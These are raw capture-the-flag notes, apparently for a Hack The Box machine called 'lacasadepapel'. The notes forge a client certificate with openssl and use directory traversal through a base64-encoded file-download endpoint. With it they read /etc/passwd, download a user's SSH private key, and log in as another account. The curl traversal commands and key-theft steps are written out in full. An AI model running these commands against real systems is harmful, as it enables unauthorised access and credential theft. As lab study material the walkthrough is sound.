3 :80 > :443
Using https://stackoverflow.com/questions/10175812/how-to-generate-a-self-signed-ssl-certificate-using-openssl
# METHOD 1 - Directly generate .pem and then .p12
$ openssl req -x509 -new -nodes -key ca.key -sha256 -out cert.pem -days 365 -subj '/CN=lacasadepapel.htb'
$ openssl pkcs12 -export -in cert.pem -inkey ca.key -out kashz.p12
# METHOD 2 - Generate a .csr, sign it with ca.key to produce the certificate (server.crt), and then build the .p12
$ openssl req -new -key ca.key -out server.csr
# Common Name (e.g. server FQDN or YOUR name) []:lacasadepapel.htb
openssl x509 -req -days 365 -in server.csr -signkey ca.key -out server.crt
openssl pkcs12 -export -in server.crt -inkey ca.key -out kashz.p12
# import the .p12 (certificate + private key) as a client certificate to access :443
# can access https://lacasadepapel.htb/
PRIVATE AREA
SEASON-1
SEASON-2
Select a season
https://lacasadepapel.htb/?path=SEASON-1
# it has .avi files for each episode, but all of them are empty.
# trying directory traversal works: ?path= is not restricted to the downloads directory
https://lacasadepapel.htb/?path=../
# trying to download a file this way fails: ?path= is passed to scandir, so it can only list directories
Error: ENOTDIR: not a directory, scandir '/home/berlin/downloads/../.ssh/id_rsa/'
# Trying to get SEASON-1/01.avi -> looking in Burp, the download request carries the file path base64-encoded
GET /file/U0VBU09OLTEvMDEuYXZp HTTP/1.1
$ echo "U0VBU09OLTEvMDEuYXZp" | base64 -d
SEASON-1/01.avi
$ curl -k https://lacasadepapel.htb/file/$(echo -n "../../../etc/passwd" | base64)
root:x:0:0:root:/root:/bin/ash
[truncated]
dali:x:1000:1000:dali,,,:/home/dali:/usr/bin/psysh
berlin:x:1001:1001:berlin,,,:/home/berlin:/bin/ash
professor:x:1002:1002:professor,,,:/home/professor:/bin/ash
# per the scandir error, the base directory is /home/berlin/downloads, so ../ is berlin's home directory
# checking the .ssh directory and downloading contents
$ curl -k https://lacasadepapel.htb/file/$(echo -n "../.ssh/id_rsa" | base64) -o berlin_id_rsa
$ curl -k https://lacasadepapel.htb/file/$(echo -n "../.ssh/authorized_keys" | base64) -o berlin_authorized_keys
$ curl -k https://lacasadepapel.htb/file/$(echo -n "../.ssh/id_rsa.pub" | base64) -o berlin_id_rsa.pub
$ cat berlin_authorized_keys
ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAsDHKXtzjeyuWjw42RbtoDy2c6lWdtfEzsmqmHrbJDY2hDcKWekWouWhe/NTCQFim6weKtsEdTzh0Qui+6jKc8/ZtpKzHrXiSXSe48JwpG7abmp5iCihzDozJqggBNoAQrvZqBhg6svcKh8F0kTnxUkBQgBm4kjOPteN+TfFoNIod7DQ72/N25D/lVThCLcStbPkR8fgBz7TGuTTAsNFXVwjlsgwi2qUF9UM6C1JkMBk5Y9ssDHiu4R35R5eCl4EEZLL946n/Gd5QB7pmIRHMkmt2ztOaKU4xZthurZpDXt+Et+Rm3dAlAZLO/5dwjqIfmEBS1eQ4sT8hlUkuLvjUDw== thek@ThekMac.local
$ cat berlin_id_rsa.pub
ssh-rsa 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 berlin@lacasadepapel.htb
# id_rsa.pub and authorized_keys DO NOT MATCH, so this key is not accepted for berlin; it may be authorized for another account
# trying ssh
# for user in berlin oslo nairobi professor dali ; do ssh -oBatchMode=yes -i ~/id_rsa_lacasadepapel_berlin $user@10.10.10.131; done
$ ssh -i berlin_id_rsa professor@10.10.10.131
_ ____ ____ ____ _
| | __ _ / ___|__ _ ___ __ _ | _ \ ___ | _ \ __ _ _ __ ___| |
| | / _` | | | / _` / __|/ _` | | | | |/ _ \ | |_) / _` | '_ \ / _ \ |
| |__| (_| | | |__| (_| \__ \ (_| | | |_| | __/ | __/ (_| | |_) | __/ |
|_____\__,_| \____\__,_|___/\__,_| |____/ \___| |_| \__,_| .__/ \___|_|
|_|
lacasadepapel [~]$ whoami;id;hostname
professor
uid=1002(professor) gid=1002(professor) groups=1002(professor)
lacasadepapel